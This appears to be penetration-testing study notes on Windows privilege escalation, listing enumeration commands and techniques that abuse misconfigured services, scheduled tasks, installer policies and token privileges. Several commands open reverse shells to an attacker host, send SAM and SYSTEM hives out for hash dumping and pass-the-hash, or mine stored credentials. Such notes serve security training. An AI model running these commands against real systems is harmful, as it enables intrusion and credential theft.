7.4 KiB
7.4 KiB
Windows Privilege Escalation
Links
Account Types
- Administrator local & domain
- Standard local & domain
- Guest
- System, local system, final escalation
- Local Service, got anonymous connections over network.
- Network Service, default service account, authentication via network
Enumeration
Users & Groups
whoami /priv
net users
net users <username>
net localgroup
net localgroup <groupname>
query session
qwinsta
Files
System
hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
- Installed software, check for existing exploits
wmic product get name,version,vendor
- Services
wmic service list brief | findstr "Running"
Exploit
DLL Hijacking
Unquoted Service Path
Token Impersonation
SeImpersonatePrivilegeis necessary, check viawhoami priv- Hot Potato is best before Server 2019 and Windows 10 (version 1809)
- Potatos
- itm4n
Schedules Tasks
schtasksandschtasks /query /tn %TASK_NAME% /fo list /vAutoruns64.exe
MSI Elevated Installer
Search for Credentials
cmdkey /list
- Use found credentials
runas /savecred /user:<user> reverse_shell.exe
- Keys containing passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
accesschk64 Permissions
- Check access to files and folders
accesschk64 -wvu "file.exe"
- If permission
SERVICE_CHANGE_CONFIGis set
sc config <service> binpath="net localgroup administrators user /add"
- Service escalation
- Any other binary works as well. Copy the compiled portable executable from the
service_escalationonto the binary path.Restart the service afterwards.
accesschk64 for Services
accesschk64 -qlc "service.exe"
- If permission
SERVICE_ALL_ACCESSis set it is configurable upload a reverse shell
icacls C:\Windows\Temp\shell.exe /grant Everyone:F
- Reconfigure and restart service
sc config TheService binPath= "C:\Path\to\shell.exe" obj= LocalSystem
sc stop TheService
sc start TheService
Startup Application
- Put reverse shell instead of an executable inside
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
Password Mining
- Set up metasploit
use auxiliary/server/capture/http_basic
set srvport 7777
set uripath pass
- Visit site on target
Unattended Windows Installation
- Investigate the following paths to potentially find user credentials
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
- Watch out for the
<Credentials>tags
Powershell History file
Get-Content %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Internet Information Services (IIS)
- Default web server on windows
- Paths containing credentials are the following
C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
Putty
- Saved proxy password credentials may be found via
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "ProxyPassword" /s
schtask and icacls
- Check
schtasks /query /tn %TASK_NAME% /fo list /v - Check script for scheduled tasks,
Fmeans full access
icacls <PathToScript>
- Put payload inside the script
echo "C:\tmp\nc.exe -e cmd.exe %ATTACKER_IP% 4711" > <PathToSript>
- Run the task
schtasks /run /tn <taskname>
Always Installs Elevated
- These should be set
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
- Craft
*.msifile with a payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f msi -o wizard.msi
- Upload and execute via
msiexec /quiet /qn /i C:\Windows\Temp\wizard.msi
Service Misconfiguration
- Check services, watch out for
BINARY_PATH_NAMEandSERVICE_START_NAME
sc qc apphostsvc
- Check found permissions via
icacls <BINARY_PATH_NAME>
- If the service binary path is writeable move the payload to its path and grant permissions
icacls <Payload_Service.exe> /grant Everyone:F
sc stop <service>
sc start <service>
- Catch the reverse shell service
Others ways are:
- Discretionary Access Control (DACL) can be opened via right click on the service and go to properties
- All services are stored under
HKLM\SYSTEM\CurrentControlSet\Services\
Unquoted Service Path
- If
BINARY_PATH_NAMEspaces are escaped incorrectly. Its path will be resolved to every space from left to right. If there is a binary with a matching name inside the directory it will be started. - A created directory at install time inherits the permissions from its parent. Check it via
icacls <directory>
- Use
service-exepayload in msfvenom upload the payload and move it on the path with the a fitting parital name of the service path - Set permissions
icacls C:\Path/to/service.exe /grant Everyone:F
Permissions
- priv2admin
whoami /priv
SeBackup / Restore
- If
SeBackup / SeRestore(rw on all files) is set an elevatedcmd.exemay be opened - Download
SAMandSystemhashes
reg save hklm\system C:\Windows\Temp\system.hive
reg save hklm\sam C:\Windows\Temp\sam.hive
- Start smb server on attack machine
copy C:\Windows\Temp\sam.hive \\ATTACKER_IP\
copy C:\Windows\Temp\system.hive \\ATTACKER_IP\
- Dump the hashes
secretsdump.py -sam sam.hive -system system.hive LOCAL
- Use pass the hash to login
psexec.py -hashes <hash> administrator@$TARGET_IP
SeTakeOwnership
- If
SeTakeOwnershipis set one can take ownership of every file or service.
takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant <user>:F
copy cmd.exe utilman.exe
- Log out, on the Login screen click on
Ease of Access
SeImpersonate / SeAssignPrimaryToken
- It is a rouge potato
- Execute process as another user
- Service accounts operate through impersonation
- Check privileges via
whoami /privfor these - Object Exporter Identifier (OXID) is executed as via DCOM as a resolver on port 135 to socket of attacker
socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
- Catch the potatoe executable from target via netcat